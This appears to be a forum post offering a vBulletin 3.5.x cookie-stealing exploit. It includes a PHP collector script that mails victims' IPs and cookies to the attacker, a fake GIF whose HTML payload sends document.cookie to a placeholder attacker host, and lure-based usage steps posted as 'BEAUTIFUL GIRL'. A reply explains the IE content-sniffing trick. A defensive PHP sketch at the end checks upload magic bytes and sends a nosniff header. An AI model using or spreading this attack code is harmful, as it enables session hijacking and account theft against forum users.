Ras

Vbulletin 3.5.x Cookie Stealer And Mailer Exploit {script}


Posted

=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
_________________________________________________________________________


( 1 )

--------------------------------------------------------------------

Name file: exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip ?: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

[url="log.php"][/url]<?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a");
$subject = "Xss Vbulletin";
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>



--------------------------------------------------------------------

<?php
$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------


( 2 )

--------------------------------------------------------------------

Name file: image.gif

--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------


( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1° new thread
2° [url="http://YOUR ADDRESS WEB.com/IMAGE.GIF"]BEAUTIFUL GIRL[/url] '
3° Submit
4° It waits for

--------------------------------------------------------------------

Content:

1.image.gif

2.exploit.php

How to:

1. Edit exploit.php, find "mail@mail.com" and replace it with your mail.

2. Then upload it to a server if you have a site, and note the link. (Any free site with PHP is enough.)

3. Open the image.gif in a text editor and replace the "http://something.com/exploit.php" with yours.

4. Put the image.gif in a vBulletin form and when the user clicks that, the gif redirects to exploit.php, this collects the cookie and you will get a mail.

Posted

It works only on IE (including 7), because it does not check the extension of a file when it is loaded in the browser and treats it as HTML.

The image trick works pretty much anywhere you can post a link :D

I tried it with PNG, not GIF, but I assume it's the same thing ...
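
Added example, not part of the original posts and not vBulletin code: the reply above attributes the issue to IE rendering a file as HTML regardless of its extension, so a forum can check the actual bytes of an uploaded attachment before storing it and send a header that disables sniffing. The function names, the sample bytes and the 256-byte sniffing window are assumptions made for this sketch.

```php
<?php
// Added example, not vBulletin code. Names and sample bytes are hypothetical.
const IMAGE_MAGIC = [
    'image/gif'  => ["GIF87a", "GIF89a"],
    'image/png'  => ["\x89PNG\r\n\x1a\n"],
    'image/jpeg' => ["\xFF\xD8\xFF"],
];

// Returns the image MIME type proven by the file's leading bytes, or null when
// the upload is not an image or carries markup where a sniffing browser looks.
function classify_upload(string $bytes, int $sniffWindow = 256): ?string
{
    $mime = null;
    foreach (IMAGE_MAGIC as $type => $signatures) {
        foreach ($signatures as $sig) {
            if (strncmp($bytes, $sig, strlen($sig)) === 0) {
                $mime = $type;
                break 2;
            }
        }
    }
    if ($mime === null) {
        return null; // e.g. an HTML text file that was only named image.gif
    }
    // Polyglot check: valid header followed by HTML inside the sniffed window.
    // Assumption: 256 bytes. This may reject a rare legitimate image;
    // re-encoding the image server-side is the stricter alternative.
    $head = substr($bytes, 0, $sniffWindow);
    if (preg_match('/<\s*(html|head|body|script|pre|iframe|img|plaintext)\b/i', $head)) {
        return null;
    }
    return $mime;
}

// Headers for serving a stored attachment. nosniff is honoured from IE 8 on,
// so the byte check is still needed for the IE versions named in the thread.
function attachment_headers(string $mime): array
{
    return ['Content-Type: ' . $mime, 'X-Content-Type-Options: nosniff'];
}

// Constructed samples: a real GIF header, a text file posing as a GIF, a polyglot.
$samples = [
    'real.gif'     => "GIF89a\x01\x00\x01\x00\x80\x00\x00",
    'fake.gif'     => "<pre onmouseover='...'>",
    'polyglot.gif' => "GIF89a<script>/* ... */</script>",
];
foreach ($samples as $name => $bytes) {
    printf("%-12s => %s\n", $name, classify_upload($bytes) ?? 'rejected');
}
```

Marking the session cookie HttpOnly (the seventh argument of PHP's `setcookie()`) additionally keeps it out of `document.cookie`, which is what the posted payload reads.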
